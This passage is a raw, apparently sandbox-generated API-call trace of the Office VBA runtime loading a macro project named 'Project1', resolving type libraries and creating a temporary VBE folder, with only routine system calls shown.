out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0068.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0068.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x1476a0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0068.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x147560, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0068.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0068.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0068.006] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e6d0, cb=0x44) returned 0x68def00 [0068.006] IMalloc:Free (This=0x7fefec05380, pv=0x67bffa0) [0068.006] wcsncpy_s (in: _Destination=0x147360, _SizeInWords=0x108, _Source="*\\Z045e95ca91", _MaxCount=0x106 | out: _Destination="*\\Z045e95ca91") returned 0x0 [0068.006] CharLowerBuffW (in: lpsz="*\\Z045e95ca91", cchLength=0xd | out: lpsz="*\\z045e95ca91") returned 0xd [0068.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045e95ca91", cchWideChar=14, lpMultiByteStr=0x147290, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045e95ca91", lpUsedDefaultChar=0x0) returned 14 [0068.006] _wcsicmp (_String1="*\\Z045e95ca91", _String2="*\\Z045e95ca91") returned 0 [0068.006] strcpy_s (in: _Dst=0x6a18828, _DstSize=0x9, _Src="Project1" | out: _Dst="Project1") returned 0x0 [0068.006] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0068.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6884528, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.006] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0068.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6884528, cbMultiByte=9, lpWideCharStr=0x6885c98, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0068.006] lstrlenA (lpString="Project1") returned 8 [0068.006] QueryPathOfRegTypeLib (in: guid=0x7fee3b39508*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), wMaj=0x2, wMin=0x0, lcid=0x0, lpbstrPathName=0x147508 | out: lpbstrPathName=0x147508) returned 0x0 [0068.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb", cchWideChar=-1, lpMultiByteStr=0x1474c0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlb", lpUsedDefaultChar=0x0) returned 32 [0068.009] lstrlenA (lpString="C:\\Windows\\system32\\stdole2.tlb") returned 31 [0068.009] lstrcpyA (in: lpString1=0x25187c0, lpString2="C:\\Windows\\system32\\stdole2.tlb" | out: lpString1="C:\\Windows\\system32\\stdole2.tlb") returned="C:\\Windows\\system32\\stdole2.tlb" [0068.009] _access_s (_FileName="C:\\Windows\\system32\\stdole2.tlb", _AccessMode=0) returned 0x0 [0068.009] free (_Block=0x25187f0) [0068.009] free (_Block=0x25187c0) [0068.010] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x147878*=0x0 | out: pptlib=0x147878*=0x665bd20) returned 0x0 [0068.010] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x147508*=0x0 | out: pptlib=0x147508*=0x665bd20) returned 0x0 [0068.010] ITypeLib:RemoteGetDocumentation (in: This=0x665bd20, index=-1, refPtrFlags=0x147528, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0068.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x147410, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0068.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0068.010] IUnknown:QueryInterface (in: This=0x665bd20, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1473e8 | out: ppvObject=0x1473e8*=0x0) returned 0x80004002 [0068.010] GetLocalTime (in: lpSystemTime=0x147290 | out: lpSystemTime=0x147290*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x5, wMilliseconds=0xc2)) [0068.010] wcsncpy_s (in: _Destination=0x146f40, _SizeInWords=0x108, _Source="*\\Z045e95ca91", _MaxCount=0x106 | out: _Destination="*\\Z045e95ca91") returned 0x0 [0068.010] CharLowerBuffW (in: lpsz="*\\Z045e95ca91", cchLength=0xd | out: lpsz="*\\z045e95ca91") returned 0xd [0068.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045e95ca91", cchWideChar=14, lpMultiByteStr=0x146e70, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045e95ca91", lpUsedDefaultChar=0x0) returned 14 [0068.010] _wcsicmp (_String1="*\\Z045e95ca91", _String2="*\\Z045e95ca91") returned 0 [0068.010] IUnknown:QueryInterface (in: This=0x665bd20, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147318 | out: ppvObject=0x147318*=0x0) returned 0x80004002 [0068.010] ITypeLib:RemoteGetLibAttr (in: This=0x665bd20, ppTLibAttr=0x147310, pDummy=0x10 | out: ppTLibAttr=0x147310, pDummy=0x10) returned 0x0 [0068.010] ITypeLib:RemoteGetDocumentation (in: This=0x665bd20, index=-1, refPtrFlags=0x0, pbstrName=0x147308, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x147308*="OLE Automation", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0068.010] StringFromGUID2 (in: rguid=0x6885c90*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x147330, cchMax=39 | out: lpsz="{00020430-0000-0000-C000-000000000046}") returned 39 [0068.010] _ultow_s (in: _Value=0x2, _Buffer=0x14727a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0068.010] _ultow_s (in: _Value=0x0, _Buffer=0x14727e, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0068.011] _ultow_s (in: _Value=0x0, _Buffer=0x147282, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0068.011] wcscpy_s (in: _Destination=0x6911158, _SizeInWords=0x5f, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0068.011] wcscpy_s (in: _Destination=0x691115e, _SizeInWords=0x5c, _Source="{00020430-0000-0000-C000-000000000046}" | out: _Destination="{00020430-0000-0000-C000-000000000046}") returned 0x0 [0068.011] wcscpy_s (in: _Destination=0x69111aa, _SizeInWords=0x36, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0068.011] wcscpy_s (in: _Destination=0x69111b8, _SizeInWords=0x2f, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0068.011] wcscpy_s (in: _Destination=0x69111f8, _SizeInWords=0xf, _Source="OLE Automation" | out: _Destination="OLE Automation") returned 0x0 [0068.011] ITypeLib:LocalReleaseTLibAttr (This=0x665bd20) returned 0x0 [0068.011] IMalloc:Realloc (This=0x7fefec05380, pv=0x690cf20, cb=0x680) returned 0xafd3b10 [0068.011] wcscpy_s (in: _Destination=0xafd3da8, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0068.011] ITypeLib:RemoteGetDocumentation (in: This=0x665bd20, index=-1, refPtrFlags=0x147428, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0068.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0068.011] strcpy_s (in: _Dst=0x147220, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0068.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x147220, cbMultiByte=7, lpWideCharStr=0x147070, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0068.011] IUnknown:AddRef (This=0x665ba50) returned 0x4 [0068.011] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="stdole", lHashVal=0x106093, pfName=0x147140, pBstrLibName=0x147070 | out: pfName=0x147140*=0, pBstrLibName=0x147070) returned 0x0 [0068.011] IUnknown:Release (This=0x665ba50) returned 0x3 [0068.011] IUnknown:AddRef (This=0x631b4c0) returned 0x5 [0068.011] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="stdole", lHashVal=0x106093, pfName=0x147140, pBstrLibName=0x147070 | out: pfName=0x147140*=0, pBstrLibName=0x147070) returned 0x0 [0068.011] IUnknown:Release (This=0x631b4c0) returned 0x4 [0068.011] IMalloc:Alloc (This=0x7fefec05380, cb=0x24) returned 0x682e910 [0068.011] IMalloc:Free (This=0x7fefec05380, pv=0x68def00) [0068.011] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e700 [0068.011] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e700, cb=0x50) returned 0x680a340 [0068.011] IMalloc:Free (This=0x7fefec05380, pv=0x682e910) [0068.012] wcsncpy_s (in: _Destination=0x147020, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0068.012] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0068.012] IMalloc:Alloc (This=0x7fefec05380, cb=0xbe) returned 0x396fa0 [0068.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x396fa0, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0068.012] IMalloc:Free (This=0x7fefec05380, pv=0x396fa0) [0068.012] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0 [0068.012] wcsncpy_s (in: _Destination=0x147020, _SizeInWords=0x108, _Source="*\\Z045e95ca91", _MaxCount=0x106 | out: _Destination="*\\Z045e95ca91") returned 0x0 [0068.012] CharLowerBuffW (in: lpsz="*\\Z045e95ca91", cchLength=0xd | out: lpsz="*\\z045e95ca91") returned 0xd [0068.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045e95ca91", cchWideChar=14, lpMultiByteStr=0x146f50, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045e95ca91", lpUsedDefaultChar=0x0) returned 14 [0068.012] _wcsicmp (_String1="*\\Z045e95ca91", _String2="*\\Z045e95ca91") returned 0 [0068.012] IUnknown:AddRef (This=0x665bd20) returned 0x6 [0068.012] IUnknown:QueryInterface (in: This=0x665bd20, riid=0x7fee3b285a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147448 | out: ppvObject=0x147448*=0x0) returned 0x80004002 [0068.012] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0068.012] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", _SizeInBytes=0x104, _Source="\\3" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\\3") returned 0x0 [0068.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1477b0, cbMultiByte=-1, lpWideCharStr=0x147710, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\\3") returned 69 [0068.012] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\\3", pptlib=0x1477a0*=0x0 | out: pptlib=0x1477a0*=0x3f12710) returned 0x0 [0068.021] ITypeLib:GetTypeInfoOfGuid (in: This=0x3f12710, GUID=0x7fee3b28ed0, ppTInfo=0x147930 | out: ppTInfo=0x147930*=0x69f9d88) returned 0x0 [0068.021] malloc (_Size=0x68) returned 0x25186f0 [0068.021] ITypeInfo:RemoteGetTypeAttr (in: This=0x69f9d88, ppTypeAttr=0x147880, pDummy=0x0 | out: ppTypeAttr=0x147880, pDummy=0x0) returned 0x0 [0068.021] ITypeInfo:LocalReleaseTypeAttr (This=0x69f9d88) returned 0x0 [0068.021] ITypeInfo:RemoteGetTypeAttr (in: This=0x69f9d88, ppTypeAttr=0x147820, pDummy=0x0 | out: ppTypeAttr=0x147820, pDummy=0x0) returned 0x0 [0068.021] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x1476c0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0068.021] _access (_FileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", _AccessMode=0) returned 0 [0068.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x147580, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0068.023] lstrlenA (lpString="VBE") returned 3 [0068.023] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0068.023] _msize (_Block=0x25187c0) returned 0x26 [0068.023] realloc (_Block=0x25187c0, _Size=0x29) returned 0x2fcdf90 [0068.023] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0068.023] lstrlenA (lpString="VBE") returned 3 [0068.023] _msize (_Block=0x25187f0) returned 0x26 [0068.023] realloc (_Block=0x25187f0, _Size=0x29) returned 0x251a390 [0068.023] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0068.023] lstrlenA (lpString="VBE") returned 3 [0068.023] lstrcatA (in: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", lpString2="VBE" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" [0068.023] strcpy_s (in: _Dst=0x251a390, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0068.023] _access_s (_FileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE", _AccessMode=0) returned 0x2 [0068.024] strcpy_s (in: _Dst=0x251a390, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0068.024] _mkdir (_Path="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0 [0068.024] strcpy_s (in: _Dst=0x251a390, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0068.025] strcpy_s (in: _Dst=0x251a390, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0068.025] strcpy_s (in: _Dst=0x251a390, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0068.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x251a390, cbMultiByte=-1, lpWideCharStr=0x147520, cchWideChar=41 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 41 [0068.025] free (_Block=0x251a390) [0068.025] free (_Block=0x2fcdf90) [0068.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE", cchWideChar=-1, lpMultiByteStr=0x1477c0, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE", lpUsedDefaultChar=0x0) returned 41 [0068.025] _access_s (_FileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE", _AccessMode=0) returned 0x0 [0068.025] IUnknown:AddRef (This=0x69f9d88) returned 0x2 [0068.025] ITypeInfo:LocalReleaseTypeAttr (This=0x69f9d88) returned 0x0 [0068.025] StringFromCLSID (in: rclsid=0x251871c*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a)), lplpsz=0x1477f0 | out: lplpsz=0x1477f0*="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 0x0 [0068.025] IMalloc:Alloc (This=0x7fefec05380, cb=0x27) returned 0x682e700 [0068.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{3832D640-CF90-11CF-8E43-00A0C911005A}", cchWideChar=-1, lpMultiByteStr=0x682e700, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{3832D640-CF90-11CF-8E43-00A0C911005A}", lpUsedDefaultChar=0x0) returned 39 [0068.025] IMalloc:Free (This=0x7fefec05380, pv=0x680a3a0) [0068.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x147800, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0068.025] lstrlenA (lpString="VBE") returned 3 [0068.025] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 38 [0068.025] malloc (_Size=0x39) returned 0x251a390 [0068.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x1477f0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0068.025] wsprintfA (in: param_1=0x251a390, param_2="%s;%s;&H%08lX" | out: param_1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0068.025] wsprintfA (in: param_1=0x147818, param_2="&H%08lX" | out: param_1="&H00000001") returned 10 [0068.025] malloc (_Size=0x120) returned 0x251c450 [0068.026] lstrcpynA (in: lpString1=0x251c470, lpString2="Host Extender Info", iMaxLength=256 | out: lpString1="Host Extender Info") returned="Host Extender Info" [0068.026] malloc (_Size=0x120) returned 0x251c580 [0068.026] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0068.026] malloc (_Size=0x36) returned 0x2fcdf90 [0068.026] lstrcpyA (in: lpString1=0x2fcdf90, lpString2="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" | out: lpString1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" [0068.026] free (_Block=0x251a390) [0068.026] IMalloc:Free (This=0x7fefec05380, pv=0x682e700) [0068.026] GetCurrentThreadId () returned 0x8ec [0068.026] malloc (_Size=0x50) returned 0x251c6b0 [0068.026] GetCurrentThreadId () returned 0x8ec [0068.026] IMalloc:Alloc (This=0x7fefec05380, cb=0x28) returned 0x682e700 [0068.026] GetCursorPos (in: lpPoint=0x147a40 | out: lpPoint=0x147a40*(x=1328, y=694)) returned 1 [0068.026] GetCapture () returned 0x0 [0068.026] WindowFromPoint (Point=0x2b70000052e) returned 0x40154 [0068.027] GetWindowThreadProcessId (in: hWnd=0x40154, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8ec [0068.027] SendMessageA (hWnd=0x40154, Msg=0x84, wParam=0x0, lParam=0x2b7052e) returned 0x1 [0068.027] SendMessageA (hWnd=0x40154, Msg=0x20, wParam=0x40154, lParam=0x2000001) returned 0x0 [0068.027] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0068.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6885c98, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.027] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0068.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6885c98, cbMultiByte=9, lpWideCharStr=0x6884528, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0068.027] IsCharAlphaA (ch=78) returned 1 [0068.027] lstrlenA (lpString="Normal") returned 6 [0068.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x147a40, cbMultiByte=-1, lpWideCharStr=0x2519b10, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0068.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x1478d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0068.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0068.027] lstrlenA (lpString="Normal") returned 6 [0068.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x147a40, cbMultiByte=-1, lpWideCharStr=0x2519b10, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0068.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x147890, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0068.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0068.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0068.028] lstrlenA (lpString="Normal") returned 6 [0068.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x147880, cbMultiByte=-1, lpWideCharStr=0x147800, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0068.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x147740, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0068.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0068.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x147750, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0068.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0068.028] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0068.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6885c98, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.028] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0068.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6885c98, cbMultiByte=9, lpWideCharStr=0x6884528, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0068.028] lstrcmpA (lpString1="Project1", lpString2="Normal") returned 1 [0068.028] lstrcmpiA (lpString1="Project1", lpString2="Normal") returned 1 [0068.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x147730, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0068.028] lstrcmpiA (lpString1="Project1", lpString2="Normal") returned 1 [0068.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0068.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x147630, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0068.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0068.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42b2a3e, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.029] GetLocalTime (in: lpSystemTime=0x1474d0 | out: lpSystemTime=0x1474d0*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x5, wMilliseconds=0xd1)) [0068.029] wcsncpy_s (in: _Destination=0x147180, _SizeInWords=0x108, _Source="*\\Z045e95ca91", _MaxCount=0x106 | out: _Destination="*\\Z045e95ca91") returned 0x0 [0068.029] CharLowerBuffW (in: lpsz="*\\Z045e95ca91", cchLength=0xd | out: lpsz="*\\z045e95ca91") returned 0xd [0068.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045e95ca91", cchWideChar=14, lpMultiByteStr=0x1470b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 